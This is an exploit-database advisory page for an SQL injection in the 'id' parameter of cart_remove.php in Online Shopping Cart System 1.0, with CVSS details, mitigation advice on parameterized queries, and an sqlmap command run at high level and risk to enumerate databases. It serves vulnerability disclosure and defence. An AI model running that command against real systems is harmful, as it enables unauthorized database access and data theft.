header-logo
Suggest Exploit
vendor:
Online Shopping Cart System
by:
Aydın Baran Ertemir
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Online Shopping Cart System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_shopping_cart_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2021

Online Shopping Cart System 1.0 – ‘id’ SQL Injection

Online Shopping Cart System 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the database. This can be done by using the 'id' parameter in the 'cart_remove.php' page. The attacker can use the SQLMAP tool to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
# Date: 14.1.2021
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3

Navigation

Suggest Exploit

Services By CQR